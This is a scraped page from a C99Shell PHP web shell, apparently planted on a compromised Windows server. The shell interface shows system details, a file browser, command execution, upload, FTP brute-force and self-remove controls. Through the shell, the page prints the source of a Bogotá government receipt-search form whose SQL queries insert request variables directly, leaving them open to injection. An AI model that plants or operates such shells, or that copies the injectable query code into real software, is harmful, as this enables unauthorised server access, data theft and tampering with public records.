!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\phpscripts\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     recibofind1.php (14.41 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Formulario de Autoliquidaci&oacute;n de Servicios de Evaluaci&oacute;n o Seguimiento Ambiental</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body topmargin="0">
<table width="100%" border="0">
  <tr>
    <td><font color="#FFFFFF">aaaaaaaaa</font></td>
    <td> <form name="form1" method="post" action="requireauto5.php">
        <table width="100%" border="0" cellpadding="5">
          <tr> 
            <td width="38%"> <div align="left"><img src="banner.gif" width="319" height="150"></div></td>
            <td width="62%" valign="top"> <p><img src="banner1.gif" width="522" height="56"></p>
              <table width="100%" border="0" cellpadding="5">
                <tr> 
                  <td><div align="right"><img src="bot1.gif" width="106" height="28"><img src="bot2.gif" width="129" height="28"><img src="bot3.gif" width="133" height="28"></div></td>
                </tr>
              </table></td>
          </tr>
          <tr bgcolor="#BEE2F8"> 
            <td><div align="left"><font size="5" face="Verdana, Arial, Helvetica, sans-serif"><img src="../auto/pun.gif" width="16" height="16"> 
                Buscar recibo</font></div></td>
            <td bgcolor="#BEE2F8"> <div align="right"> 
                <p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><font size="1">Esta 
                  ventana permite buscar un recibo por su n&uacute;mero.</font></strong></font></p>
              </div></td>
          </tr>
          <tr bgcolor="#F8F8EF"> 
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="../auto/p.gif" width="10" height="10"> 
              N&uacute;mero de recibo a buscar:</font></td>
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <input name="nure" type="text" id="nure2" size="15">
              <input name="radiobutton1" type="radio" value="nure" checked>
              </font></td>
          </tr>
          <tr bgcolor="#F8F8EF"> 
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="../auto/p.gif" width="10" height="10"> 
              Fecha de recibos a buscar:</font></td>
            <td><p><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Entre: 
                </font></strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                D&iacute;a: 
                <select name="diai" id="diai">
                  <option value="1">1</option>
                  <option value="2">2</option>
                  <option value="3">3</option>
                  <option value="4">4</option>
                  <option value="5">5</option>
                  <option value="6">6</option>
                  <option value="7">7</option>
                  <option value="8">8</option>
                  <option value="9">9</option>
                  <option value="10">10</option>
                  <option value="11">11</option>
                  <option value="12">12</option>
                  <option value="13">13</option>
                  <option value="14">14</option>
                  <option value="15">15</option>
                  <option value="16">16</option>
                  <option value="17">17</option>
                  <option value="18">18</option>
                  <option value="19">19</option>
                  <option value="20">20</option>
                  <option value="21">21</option>
                  <option value="22">22</option>
                  <option value="23">23</option>
                  <option value="24">24</option>
                  <option value="25">25</option>
                  <option value="26">26</option>
                  <option value="27">27</option>
                  <option value="28">28</option>
                  <option value="29">29</option>
                  <option value="30">30</option>
                  <option value="31">31</option>
                </select>
                Mes: 
                <select name="mesi" id="mesi">
                  <option value="January">Enero</option>
                  <option value="Febrary">Febrero</option>
                  <option value="March">Marzo</option>
                  <option value="April">Abril</option>
                  <option value="May">Mayo</option>
                  <option value="June">Junio</option>
                  <option value="July">Julio</option>
                  <option value="August">Agosto</option>
                  <option value="September">Septiembre</option>
                  <option value="October">Octubre</option>
                  <option value="November">Noviembre</option>
                  <option value="December">Diciembre</option>
                </select>
                A&ntilde;o: 
                <select name="anoi" id="anoi">
                  <option value="2003">2003</option>
                  <option value="2004">2004</option>
                  <option value="2005">2005</option>
                  <option value="2006">2006</option>
                  <option value="2007">2007</option>
                  <option value="2008">2008</option>
                  <option value="2009">2009</option>
                  <option value="2010">2010</option>
                  <option value="2011">2011</option>
                  <option value="2012">2012</option>
                  <option value="2013">2013</option>
                </select>
                </font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                <input type="radio" name="radiobutton1" value="fech">
                </font></p></td>
          </tr>
          <tr bgcolor="#F8F8EF">
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="../auto/p.gif" width="10" height="10"> 
              Texto en tr&aacute;mites:</font></td>
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
              <input name="texto3" type="text" id="texto3" size="35">
              <input type="radio" name="radiobutton1" value="trami">
              </font></td>
          </tr>
          <tr bgcolor="#F8F8EF"> 
            <td><p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="../auto/p.gif" width="10" height="10"> 
                Texto en beneficiario u nombre de la obra<br>
                o el proyecto</font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                :</font></p></td>
            <td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
              <input name="texto" type="text" id="texto" size="35">
              <input type="radio" name="radiobutton1" value="text">
              </font></td>
          </tr>
          <tr bgcolor="#F8F8EF"> 
            <td bgcolor="#FFFFFF"><div align="right"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Discriminar 
                por:</strong></font></div></td>
            <td bgcolor="#BEE2F8"><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                <input name="radiobutton" type="radio" value="can">
                Recibos pagados 
                <input type="radio" name="radiobutton" value="nocan">
                Recibos por pagar 
                <input name="radiobutton" type="radio" value="all" checked>
                Todos</font></div></td>
          </tr>
          <tr bgcolor="#F8F8EF"> 
            <td bgcolor="#FFFFFF">&nbsp;</td>
            <td bgcolor="#BEE2F8"> <div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                <font color="#BEE2F8">i</font> 
                <input type="submit" name="Submit" value="Buscar....">
                </font></div></td>
          </tr>
        </table>
      </form>
<?php
$gt 
0;
$find = isset($nure);
if (
$find == true) {        
?>
      <p><font size="5" face="Verdana, Arial, Helvetica, sans-serif"><img src="../auto/pun.gif" width="16" height="16"> 
        Resultados de b&uacute;squeda de Recibos:</font></p>
      <table width="100%" border="0" cellspacing="0" cellpadding="2">
        <tr> 
          <td width="10%" bgcolor="#BEE2F8"> 
            <div align="center"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">N&oacute;</font></strong></div></td>
          <td width="10%" bgcolor="#BEE2F8"> 
            <div align="center"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Fecha</font></strong></div></td>
          <td width="25%" bgcolor="#BEE2F8"> 
            <div align="center"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Proyecto:</font></strong></div></td>
          <td width="20%" bgcolor="#BEE2F8"> <div align="center"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Beneficiario:</font></strong></div></td>
          <td width="20%" bgcolor="#BEE2F8"> <div align="center"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Ubicaci&oacute;n:</font></strong></div></td>
          <td width="15%" bgcolor="#BEE2F8"> 
            <div align="center"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Valor:</font></strong></div></td>
        </tr>
        
<?php
require('conexion.php');
$gt 1;
if (
$radiobutton1 == "nure") {
$consul "SELECT *
            FROM vali
            WHERE cons = 
$nure";
            
$bf 0;
            }
if (
$radiobutton1 == "text" and $radiobutton == "all") {
$consul "SELECT *
            FROM vali
            WHERE pro LIKE '%
$texto%' or name LIKE '%$texto%'"
            
" order by cons";
            
$bf 0;
            }
if (
$radiobutton1 == "text" and $radiobutton == "nocan") {
$consul "SELECT *
            FROM vali
            WHERE (pro LIKE '%
$texto%' or name LIKE '%$texto%') and cancel='0'"
            
" order by cons";
            
$bf 0;
            }
if (
$radiobutton1 == "text" and $radiobutton == "can") {
$consul "SELECT *
            FROM vali
            WHERE (pro LIKE '%
$texto%' or name LIKE '%$texto%') and cancel='1'"
            
" order by cons";
            
$bf 0;
            }
if (
$radiobutton1 == "trami" and $radiobutton == "nocan") {
$consul "SELECT *
            FROM vali
            WHERE (noms LIKE '%
$texto3%') and cancel='0'"
            
" order by cons";
            
$bf 0;
            }
if (
$radiobutton1 == "trami" and $radiobutton == "can") {
$consul "SELECT *
            FROM vali
            WHERE (noms LIKE '%
$texto3%') and cancel='1'"
            
" order by cons";
            
$bf 0;
            }
if (
$radiobutton1 == "trami" and $radiobutton == "all") {
$consul "SELECT *
            FROM vali
            WHERE noms LIKE '%
$texto3%'"
            
" order by cons";
            
$bf 0;
            }
if (
$radiobutton1 == "fech" and $radiobutton == "all") {
$fei $diai "/" $mesi "/" $anoi;
$consul "SELECT *
            FROM vali"
            
" order by cons";
            
$bf 1;
            }
if (
$radiobutton1 == "fech" and $radiobutton == "nocan") {
$fei $diai "/" $mesi "/" $anoi;
$consul "SELECT *
            FROM vali WHERE cancel='0'"
            
" order by cons";
            
$bf 1;
            }
if (
$radiobutton1 == "fech" and $radiobutton == "can") {
$fei $diai "/" $mesi "/" $anoi;
$consul "SELECT *
            FROM vali WHERE cancel='1'"
            
" order by cons";
            
$bf 1;
            }            
            
$keni 0;
            
$result mysql_query($consul,$db);
            
$num_filas mysql_num_rows($result);
            while (
$myrow mysql_fetch_array($result)){
            
$cons $myrow["cons"];
            
$pro $myrow["pro"];
            
$name $myrow["name"];
            
$mday $myrow["mday"];
            
$month $myrow["month"];
            
$year $myrow["year"];
            
$fin $myrow["fin"];
            
$ubi $myrow["ubi"];
            
$can $myrow["cancel"];
            
$feci $mday "/" $month "/" $year;
            
$keni $keni $fin;
            if (
$bf == 0) {
            
?>
            <tr valign="top">
          <td width="10%" bgcolor="#FBDEAA">
            <div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $cons?></font></div></td>
          <td width="10%">
            <div align="center"><font color="#999999" size="2" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $feci?></font></div></td>
          <td width="25%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="requireauto3.php?nure=<?php echo $cons?>"><?php echo $pro?></a></font></td>
          <td width="20%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $name?></font></td>
          <td width="20%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $ubi?></font></td>
          <td width="15%">
            <div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">$ 
             <?php echo $fin?></font></div></td>
        </tr>
        <?php
                    
}
        if (
$bf == 1) {
        if (
$feci == $fei) {
            
?>
            <tr valign="top">
          <td width="10%" bgcolor="#FBDEAA">
            <div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $cons?></font></div></td>
          <td width="10%">
            <div align="center"><font color="#999999" size="2" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $feci?></font></div></td>
          <td width="25%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="requireauto3.php?nure=<?php echo $cons?>"><?php echo $pro?></a></font></td>
          <td width="20%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $name?></font></td>
          <td width="20%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><?php echo $ubi?></font></td>
          <td width="15%">
            <div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">$ 
             <?php echo $fin?></font></div></td>
        </tr>
        <?php
                    
}}            
                    }

?>        
         
      </table>
      <?php
     
}
     
?>
      <p><font size="5" face="Verdana, Arial, Helvetica, sans-serif"><font size="3"><strong><font color="#FF0000"><?php 
      
if ($gt == 1) {
      echo 
$num_filas
      echo 
"</font></strong> recibos encontrados</font></font>...<br>";
      echo 
$keni
      echo 
"</font></strong> Suma del total de recibos</font></font>...";
      }else{
      echo 
"</font></strong> </font></font>...";
      }
      
?>
      </p>
      <p align="center"><img src="../auto/lin.gif" width="640" height="25"><br>
        <font size="1" face="Verdana, Arial, Helvetica, sans-serif">Desarrollado 
        por el DAMA, Todos los Derechos Reservados, 2003<br>
        Bogot&aacute;, Colombia.</font></p>
      <p>&nbsp;</p></td>
    <td><font color="#FFFFFF">aaaaaaaaa</font></td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--